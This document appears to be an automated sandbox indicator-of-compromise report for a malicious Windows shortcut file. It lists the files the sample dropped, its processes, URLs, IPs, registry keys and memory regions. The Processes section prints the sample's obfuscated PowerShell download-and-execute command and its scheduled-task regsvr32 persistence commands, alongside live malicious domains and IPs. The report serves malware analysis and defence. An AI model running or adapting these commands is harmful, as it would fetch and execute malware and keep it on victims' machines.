IOC Report
fBcMVl6ns6.lnk

loading gif

Files

File Path
Type
Category
Malicious
fBcMVl6ns6.lnk
MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=19, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
initial sample
malicious
C:\Users\Public\ajbs50ul.bat
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Gga6.ini
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\M08e.ini
PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Users\user\Desktop\utox_x86_x64.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\regsvr32.EXE.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeczgi43.tht.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2ctgb41.zc3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bnkewsjx.th4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cbrff2b0.uox.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fkvuje5c.ujv.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbspg2wm.obn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ktt01nkr.xq1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kus2hrfz.ini.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqge4sys.ry3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzuodjf0.zc1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\second_data_temp.zip
Zip archive data, at least v2.0 to extract, compression method=deflate
dropped
C:\Users\user\AppData\Roaming\Tox\tox_save.tox
data
dropped
C:\Users\user\AppData\Roaming\Tox\utox_save.ini
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Tox\utox_save.in~
Generic INItialization configuration [interface]
dropped
There are 11 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit
malicious
C:\Users\Public\ajbs50ul.bat
"C:\Users\Public\ajbs50ul.bat"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
malicious
C:\Users\user\Desktop\utox_x86_x64.exe
"C:\Users\user\Desktop\utox_x86_x64.exe"
malicious
C:\Windows\System32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
malicious
C:\Windows\System32\OpenWith.exe
"C:\Windows\system32\openwith.exe"
malicious
C:\Windows\System32\regsvr32.exe
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini
malicious
C:\Windows\System32\rekeywiz.exe
"C:\Windows\system32\rekeywiz.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
malicious
C:\Program Files\Windows Media Player\wmprph.exe
"C:\Program Files\Windows Media Player\wmprph.exe"
malicious
C:\Windows\System32\regsvr32.exe
C:\Windows\system32\regsvr32.EXE /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
malicious
C:\Windows\System32\dllhost.exe
"C:\Windows\system32\dllhost.exe"
malicious
C:\Windows\System32\rekeywiz.exe
"C:\Windows\system32\rekeywiz.exe"
malicious
C:\Windows\System32\regsvr32.exe
"regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://go.micro
unknown
malicious
https://147.45.126.71:3752/20846e26ac9fe96c52/8ackhmnt.9e5wm
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://nuget.org/NuGet.exe
unknown
http://www.microsoft.w
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
https://duckduckgo.com/ac/?q=
unknown
https://1h982d.bemostake.space
unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
http://www.microsoft.
unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown
https://1h982d.bp24mostakp24.spacp24/tp24st.txt
unknown
https://www.ecosia.org/newtab/
unknown
https://rocketdocs.lol/utox_x86.exe
188.114.97.3
https://github.com/Pester/Pester
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
unknown
https://rocketdocs.lol
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://bemostake.space/test/ast21/g341g43134g/2245h1234/f21f2123/Rh-416-72-341-23.exe
188.114.96.3
http://rocketdocs.lol
unknown
https://aka.ms/pscore68
unknown
http://www.microsoft.$
unknown
http://bemostake.space
unknown
https://bemostake.space
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://1h982d.bemostake.space/test.txt
188.114.96.3
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
http://1h982d.bemostake.space
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
bemostake.space
188.114.96.3
1h982d.bemostake.space
188.114.96.3
rocketdocs.lol
188.114.97.3

IPs

IP
Domain
Country
Malicious
192.168.2.8
unknown
unknown
malicious
46.29.238.96
unknown
Russian Federation
malicious
147.45.126.71
unknown
Russian Federation
malicious
104.223.122.15
unknown
United States
malicious
185.196.9.174
unknown
Switzerland
malicious
195.93.190.6
unknown
Ukraine
148.251.23.146
unknown
Germany
104.233.104.126
unknown
Saudi Arabia
192.168.2.7
unknown
unknown
163.172.136.118
unknown
United Kingdom
192.168.2.9
unknown
unknown
95.215.44.78
unknown
Latvia
193.124.186.205
unknown
Russian Federation
192.168.2.5
unknown
unknown
8.8.8.8
unknown
United States
37.97.185.116
unknown
Netherlands
130.133.110.14
unknown
Germany
194.249.212.109
unknown
Slovenia
136.243.141.187
unknown
Germany
37.187.122.30
unknown
France
185.14.30.213
unknown
Ukraine
185.58.206.164
unknown
Russian Federation
51.254.84.212
unknown
France
80.87.193.193
unknown
Russian Federation
46.229.52.198
unknown
Ukraine
188.114.97.3
rocketdocs.lol
European Union
205.185.116.116
unknown
United States
85.21.144.224
unknown
Russian Federation
85.130.224.235
unknown
Israel
188.114.96.3
bemostake.space
European Union
192.168.2.255
unknown
unknown
198.98.51.198
unknown
United States
There are 22 hidden IPs, click here to show them.

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum 64-bit
Version
HKEY_CURRENT_USER\SOFTWARE\SibCode
sn2
There are 6 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1BA01000
direct allocation
page execute and read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9DF920000
direct allocation
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
28D0000
direct allocation
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0C91000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1F9E0D8D000
heap
page read and write
malicious
1B6F3000
trusted library allocation
page read and write
2403AAD9000
heap
page read and write
7FFB4B320000
trusted library allocation
page read and write
10B5000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0D28000
heap
page read and write
1F9DE0A8000
heap
page read and write
1BDC2DC9000
heap
page read and write
1F3DAC0B000
heap
page read and write
872BB3C000
stack
page read and write
1F9E0CC8000
heap
page read and write
1B400000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
8AC2BFE000
stack
page read and write
1F9E0E8A000
heap
page read and write
231A8AC5000
heap
page read and write
1F9DE0AF000
heap
page read and write
7FF63D220000
unkown
page readonly
7FFB4B670000
trusted library allocation
page read and write
1C340000
trusted library allocation
page read and write
1C3B0000
trusted library allocation
page read and write
7FFBAA430000
unkown
page readonly
1B6E0000
trusted library allocation
page read and write
1C3D0000
trusted library allocation
page read and write
D85000
heap
page read and write
1C3E0000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B264000
trusted library allocation
page read and write
1F9E07E6000
unkown
page read and write
1F9E0E8A000
heap
page read and write
1F3F4C77000
heap
page execute and read and write
1F9E0CF8000
heap
page read and write
1F9E0CB0000
heap
page read and write
1BF1A000
stack
page read and write
1F3F523E000
heap
page read and write
1F9E0411000
heap
page read and write
1F9E0CE8000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E0CE8000
heap
page read and write
24D91250000
remote allocation
page execute and read and write
231A88D8000
heap
page read and write
1B4D0000
trusted library allocation
page read and write
1F9E043B000
heap
page read and write
1F9E0CB8000
heap
page read and write
24023D51000
trusted library allocation
page read and write
1C415000
trusted library allocation
page read and write
7FFB4B490000
trusted library allocation
page read and write
1BDC6805000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1F9E0237000
heap
page read and write
7FF63D2DB000
unkown
page write copy
54CE000
heap
page read and write
1F9E0CE0000
heap
page read and write
1F9E0411000
heap
page read and write
7FFB4B420000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
1B558000
heap
page read and write
27B3000
trusted library allocation
page read and write
1B413000
trusted library allocation
page read and write
1BDC4A30000
heap
page read and write
1C330000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1BE55000
trusted library allocation
page read and write
1B750000
trusted library allocation
page read and write
57FF000
stack
page read and write
1F9E06C3000
heap
page read and write
1BDC6118000
trusted library allocation
page read and write
DC1000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1BDC3035000
heap
page read and write
1B590000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
24D91490000
heap
page read and write
2403A7A3000
heap
page read and write
5499000
heap
page read and write
1F9E0CE0000
heap
page read and write
1B307000
trusted library allocation
page read and write
22130921000
heap
page read and write
1BDB0000
trusted library allocation
page read and write
E4E000
heap
page read and write
1F9E0D00000
heap
page read and write
7FFB4B540000
trusted library allocation
page read and write
1F9E0D00000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
D3C000
heap
page read and write
1F9E0CC8000
heap
page read and write
20EE000
stack
page read and write
1F9E0D48000
heap
page read and write
1B300000
trusted library allocation
page read and write
1C0A3000
trusted library allocation
page read and write
130F000
stack
page read and write
1B6E0000
trusted library allocation
page read and write
2E5F000
trusted library allocation
page read and write
1F9E0352000
heap
page read and write
BF082FE000
stack
page read and write
1B6E0000
trusted library allocation
page read and write
1BFDB000
stack
page read and write
1F9E0D40000
heap
page read and write
1B54C000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B4A0000
trusted library allocation
page read and write
2403AE19000
heap
page read and write
231A88D0000
heap
page read and write
7FFB4B440000
trusted library allocation
page execute and read and write
3C0367E000
stack
page read and write
1B6E0000
trusted library allocation
page read and write
539D000
heap
page read and write
231A8AC0000
heap
page read and write
1F3DAC0D000
heap
page read and write
1F9E044B000
heap
page read and write
1C430000
trusted library allocation
page read and write
1F9E0D01000
heap
page read and write
7FFB4B4F0000
trusted library allocation
page read and write
26F0000
heap
page execute and read and write
1F3F4B65000
heap
page read and write
1F9E0CD0000
heap
page read and write
1C530000
trusted library allocation
page read and write
7DF43B4F6000
unkown
page read and write
7FFB4B326000
trusted library allocation
page execute and read and write
1AA3FF10000
trusted library allocation
page read and write
1F9E0CF8000
heap
page read and write
1F9E0358000
heap
page read and write
1F9E0CB8000
heap
page read and write
1B445000
trusted library allocation
page read and write
1B5BD000
heap
page read and write
1BD89000
trusted library allocation
page read and write
2733000
trusted library allocation
page read and write
1C450000
trusted library allocation
page read and write
7FF63D3FC000
unkown
page write copy
1BFE0000
trusted library allocation
page read and write
1F9E0D48000
heap
page read and write
1B4C0000
trusted library allocation
page read and write
C10000
heap
page read and write
1BDC2DC1000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1F9E0660000
unkown
page read and write
1F9E0CE8000
heap
page read and write
1F9E0D10000
heap
page read and write
1F9E0D10000
heap
page read and write
1F9E0CE0000
heap
page read and write
1F9E045E000
heap
page read and write
1B320000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1BD70000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
35EF000
stack
page read and write
1B300000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
2403AB4A000
heap
page read and write
240325A3000
trusted library allocation
page read and write
1BD81000
trusted library allocation
page read and write
1C50D000
trusted library allocation
page read and write
1F9E042E000
heap
page read and write
1F3DABFE000
heap
page read and write
7C8000
heap
page read and write
1C590000
trusted library allocation
page read and write
3C03877000
stack
page read and write
1BEE0000
trusted library allocation
page read and write
2207000
heap
page read and write
1F9E0CB8000
heap
page read and write
1BF50000
trusted library allocation
page read and write
1B170000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
7DD000
heap
page read and write
7FFB4B5A3000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1AA41F40000
heap
page read and write
7FFB4B260000
trusted library allocation
page read and write
1BE70000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1BE63000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1BDC612B000
trusted library allocation
page read and write
7FFB4B540000
trusted library allocation
page read and write
1BE53000
trusted library allocation
page read and write
1F9E0CC8000
heap
page read and write
1F9E0CC8000
heap
page read and write
1AA419CA000
heap
page read and write
1B6E3000
trusted library allocation
page read and write
26E0000
trusted library allocation
page read and write
1AA3FFD1000
heap
page read and write
27B0000
trusted library allocation
page read and write
DB0000
heap
page readonly
5392000
heap
page read and write
1BE55000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B460000
trusted library allocation
page read and write
6A7000
unkown
page readonly
1B5C6000
heap
page read and write
7FFB4B6E0000
trusted library allocation
page read and write
7FFB4B2F0000
trusted library allocation
page read and write
1B310000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
1C570000
trusted library allocation
page read and write
1F3DAC4B000
heap
page read and write
1F9E0CF8000
heap
page read and write
2403A8A6000
heap
page execute and read and write
1C1D0000
trusted library allocation
page read and write
1F3F4F08000
heap
page read and write
240224C3000
trusted library allocation
page read and write
1F9E0CB0000
heap
page read and write
1B2D0000
trusted library section
page read and write
3C035FD000
stack
page read and write
1F9E0E8A000
heap
page read and write
1F9E0F0F000
heap
page read and write
7FFB4B560000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1344000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E0E8A000
heap
page read and write
1BFF0000
trusted library allocation
page read and write
1B230000
heap
page read and write
1B808000
heap
page read and write
1B5C4000
heap
page read and write
1F9E0CE8000
heap
page read and write
7FFB4B316000
trusted library allocation
page read and write
1290000
heap
page read and write
1B6D0000
trusted library allocation
page read and write
7FFB4B28D000
trusted library allocation
page execute and read and write
7FFB4B450000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
1AA41981000
heap
page read and write
7FFB4B500000
trusted library allocation
page read and write
7FFBAA4A8000
unkown
page readonly
1F3F4C30000
heap
page execute and read and write
1C480000
trusted library allocation
page read and write
1F9E0C91000
heap
page read and write
7FFB4B28D000
trusted library allocation
page execute and read and write
1F9E040C000
heap
page read and write
1C000000
trusted library allocation
page read and write
1B806000
heap
page read and write
10A0000
trusted library allocation
page read and write
1B730000
trusted library allocation
page read and write
1AF78000
heap
page read and write
1BE50000
trusted library allocation
page read and write
1C4D0000
trusted library allocation
page read and write
1BDF0000
trusted library allocation
page read and write
4D4D000
stack
page read and write
1F9E02FE000
heap
page read and write
1F3F4E2C000
heap
page read and write
1C5A3000
trusted library allocation
page read and write
1F9E0CB8000
heap
page read and write
28D0000
trusted library allocation
page read and write
1B360000
trusted library allocation
page read and write
7FFB4B432000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
7FFB4B5E0000
trusted library allocation
page read and write
1F9E0D10000
heap
page read and write
1F9E0CE8000
heap
page read and write
1C4B0000
trusted library allocation
page read and write
1B5BD000
heap
page read and write
DEB000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E0D18000
heap
page read and write
1F9E0CB8000
heap
page read and write
7FFB4B410000
trusted library allocation
page read and write
1BFE0000
trusted library allocation
page read and write
1F9E09E5000
unkown
page read and write
1BEB0000
trusted library allocation
page read and write
872B9BE000
stack
page read and write
7FF7F0845000
direct allocation
page execute and read and write
1F3DE220000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
7FF63D3FB000
unkown
page write copy
1C510000
trusted library allocation
page read and write
1F9DE0BC000
heap
page read and write
1F9E0CD0000
heap
page read and write
1F9E0CB8000
heap
page read and write
1F9E041E000
heap
page read and write
7FFB4B262000
trusted library allocation
page read and write
1B6F0000
trusted library allocation
page read and write
7DF43B4E6000
unkown
page read and write
1BA00000
trusted library allocation
page read and write
1C2D0000
trusted library allocation
page read and write
7FF7F0501000
direct allocation
page execute and read and write
1F9E0423000
heap
page read and write
1BDC4750000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
1BFA0000
trusted library allocation
page read and write
1BFE0000
trusted library allocation
page read and write
1C3F0000
trusted library allocation
page read and write
1F9E0CF8000
heap
page read and write
1F9E0C91000
heap
page read and write
872B4FE000
stack
page read and write
2A4AD000000
heap
page read and write
1C460000
trusted library allocation
page read and write
1F9E0CB0000
heap
page read and write
1F9E0CD0000
heap
page read and write
7FFB4B700000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
7FFB4B570000
trusted library allocation
page read and write
1F9E0D28000
heap
page read and write
1F9E0E8A000
heap
page read and write
1B6E0000
trusted library allocation
page read and write
1B710000
trusted library allocation
page read and write
1F3F4BBF000
heap
page read and write
1B3D0000
heap
page execute and read and write
7FFBAA431000
unkown
page execute read
116B000
heap
page read and write
1C3AF000
trusted library allocation
page read and write
2212EE79000
heap
page read and write
1BFF0000
trusted library allocation
page read and write
5416000
heap
page read and write
1B5C4000
heap
page read and write
1AA3FF00000
heap
page readonly
1F9E0E8A000
heap
page read and write
1C4D0000
trusted library allocation
page read and write
2ECB000
trusted library allocation
page read and write
1F9E0CC5000
heap
page read and write
3C0464E000
stack
page read and write
1B3E0000
trusted library allocation
page read and write
7FFB4B590000
trusted library allocation
page read and write
872B7BF000
stack
page read and write
7FFB4B680000
trusted library allocation
page read and write
1F9E0CD0000
heap
page read and write
1B310000
trusted library allocation
page read and write
1F9E0CA0000
heap
page read and write
3C03AFE000
stack
page read and write
1B5CE000
heap
page read and write
7FF63D221000
unkown
page execute read
1F3DD770000
trusted library allocation
page read and write
1F9E042D000
heap
page read and write
1F9E0CB0000
heap
page read and write
1B490000
trusted library allocation
page read and write
1F9E0D70000
heap
page read and write
1B300000
trusted library allocation
page read and write
7FFB4B263000
trusted library allocation
page execute and read and write
24D916A6000
heap
page read and write
D2E000
heap
page read and write
1AA41980000
heap
page read and write
1F9E0453000
heap
page read and write
1F9E0E8A000
heap
page read and write
1AA40150000
heap
page read and write
1F9E0CE0000
heap
page read and write
1B549000
heap
page read and write
BC0000
heap
page read and write
1F9E03FC000
heap
page read and write
1F9E0CE8000
heap
page read and write
7FFB4B326000
trusted library allocation
page read and write
1BDD4A6F000
trusted library allocation
page read and write
1BE80000
trusted library allocation
page read and write
7FFB4B4B0000
trusted library allocation
page read and write
1C350000
trusted library allocation
page read and write
53FA000
heap
page read and write
2EA5000
trusted library allocation
page read and write
1C460000
trusted library allocation
page read and write
1C356000
unkown
page read and write
1B303000
trusted library allocation
page read and write
7FFB4B440000
trusted library allocation
page read and write
1B6E3000
trusted library allocation
page read and write
1B6E0000
trusted library allocation
page read and write
7FFB4B250000
trusted library allocation
page read and write
1BE30000
trusted library allocation
page read and write
1F9E0CA1000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0CB8000
heap
page read and write
1BE80000
trusted library allocation
page read and write
1B680000
trusted library allocation
page read and write
1F9E043B000
heap
page read and write
1F9E0CB0000
heap
page read and write
1F9E0CE8000
heap
page read and write
1B313000
trusted library allocation
page read and write
1BE60000
trusted library allocation
page read and write
1B180000
trusted library allocation
page read and write
2403AB46000
heap
page read and write
1F3DAD90000
trusted library allocation
page read and write
1AA41EB4000
heap
page read and write
61FF000
stack
page read and write
1BFF0000
trusted library allocation
page read and write
1BE50000
trusted library allocation
page read and write
24023E54000
trusted library allocation
page read and write
1BD60000
trusted library allocation
page read and write
1B303000
trusted library allocation
page read and write
1B811000
heap
page read and write
1B4AF000
trusted library allocation
page read and write
1C0D0000
trusted library allocation
page read and write
1F9E0E8A000
heap
page read and write
1F9E0E8A000
heap
page read and write
1F9E0E8A000
heap
page read and write
21F3000
heap
page read and write
1B7FE000
heap
page read and write
1BDDCFA0000
heap
page read and write
3C045CE000
stack
page read and write
1C0A7000
trusted library allocation
page read and write
1F9E0CE8000
heap
page read and write
1BDD4D57000
trusted library allocation
page read and write
1B4AA000
trusted library allocation
page read and write
DFB000
stack
page read and write
1BE60000
trusted library allocation
page read and write
1B300000
trusted library allocation
page read and write
1C400000
trusted library allocation
page read and write
2E22000
